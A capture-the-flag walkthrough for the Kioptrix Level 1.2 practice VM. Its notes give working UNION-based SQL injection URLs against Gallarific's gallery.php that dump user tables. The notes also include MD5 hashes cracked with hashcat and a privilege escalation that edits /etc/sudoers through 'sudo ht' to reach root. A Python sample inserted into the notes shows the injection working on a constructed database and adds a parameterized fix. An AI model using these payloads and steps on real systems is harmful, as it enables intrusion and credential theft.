Kioptrix: Level 1.2 (#3) - (SQLi)

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one’s own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge: once you find the IP (DHCP client), edit your hosts file and point it to kioptrix3.com.

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to do this.


Notes


//add ip of kioptrix level 3 vm to /etc/hosts file
192.168.216.132 kioptrix3.com

//look at the page source of
http://kioptrix3.com/gallery/gadmin/

//gallarific is present on the webserver
searchsploit Gallarific



http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,concat(userid,0x3a,username,0x3a,password),3,4,5,6 from gallarific_users-- -
1:admin:n0t7t1k4

http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts'-- -
http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,concat(id,0x3a,username,0x3a,password),3,4,5,6 from dev_accounts-- -

1:dreg:0d3eccfb887aabd50f243b3f155c0f85
2:loneferret:5badcaf789d3d1d09794d8f021f40f0e
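The two gallery.php injections above work because the id parameter is spliced straight into the SQL text. The following is an added example, not code from the page or from Gallarific: a string-built lookup that the page's UNION payload rewrites, beside a parameterized lookup that rejects it. The table layout, the photo row and the password value are constructed, and the MySQL concat()/0x3a pieces of the payload are rewritten with SQLite's || operator so it runs offline.

```python
import sqlite3

# Constructed stand-in for the Gallarific tables (column names are assumptions,
# chosen only so that gallery.php's six-column SELECT can be mimicked).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gallarific_photos(id INTEGER, title TEXT, filename TEXT,
                                       owner TEXT, description TEXT, views INTEGER);
        INSERT INTO gallarific_photos VALUES (1, 'Sunset', 'sunset.jpg', 'admin', '', 3);
        CREATE TABLE gallarific_users(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO gallarific_users VALUES (1, 'admin', 'constructed-password');
    """)
    return db

COLUMNS = "id, title, filename, owner, description, views"

def lookup_vulnerable(db, id_param):
    # Bug pattern behind gallery.php?id=: the raw parameter is pasted into the SQL
    # text, so "null and 1=0 union select ..." replaces the intended result set.
    sql = f"SELECT {COLUMNS} FROM gallarific_photos WHERE id={id_param}"
    return db.execute(sql).fetchall()

def lookup_hardened(db, id_param):
    # Fix: enforce the type the application expects, then bind the value
    # as a parameter instead of splicing it into the statement.
    if not id_param.isdigit():
        raise ValueError("id must be an unsigned integer")
    sql = f"SELECT {COLUMNS} FROM gallarific_photos WHERE id=?"
    return db.execute(sql, (int(id_param),)).fetchall()

# The page's payload; MySQL's concat(a,0x3a,b) becomes a||':'||b for SQLite.
PAYLOAD = ("null and 1=0 union select 1,userid||':'||username||':'||password,3,4,5,6 "
           "from gallarific_users-- -")

def demo():
    db = build_db()
    try:
        hardened_payload = lookup_hardened(db, PAYLOAD)
    except ValueError:
        hardened_payload = "rejected"
    return {
        "vulnerable": lookup_vulnerable(db, PAYLOAD),  # leaks 1:admin:constructed-password
        "hardened_ok": lookup_hardened(db, "1"),       # normal lookup still works
        "hardened_payload": hardened_payload,          # "rejected"
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```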

//use an online service, john, or hashcat to crack the md5 hashes

#hashcat -m 0 -a 0 file-containing-md5-hash /usr/share/wordlists/rockyou.txt

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

// crackstation.net
0d3eccfb887aabd50f243b3f155c0f85    md5 Mast3r   --> dreg
5badcaf789d3d1d09794d8f021f40f0e    md5 starwars   --> loneferret

//ssh to the target machine as loneferret

# sudo ht
edit /etc/sudoers
loneferret ALL=(ALL) ALL

save and exit

# sudo /bin/sh
password: starwars

#root :D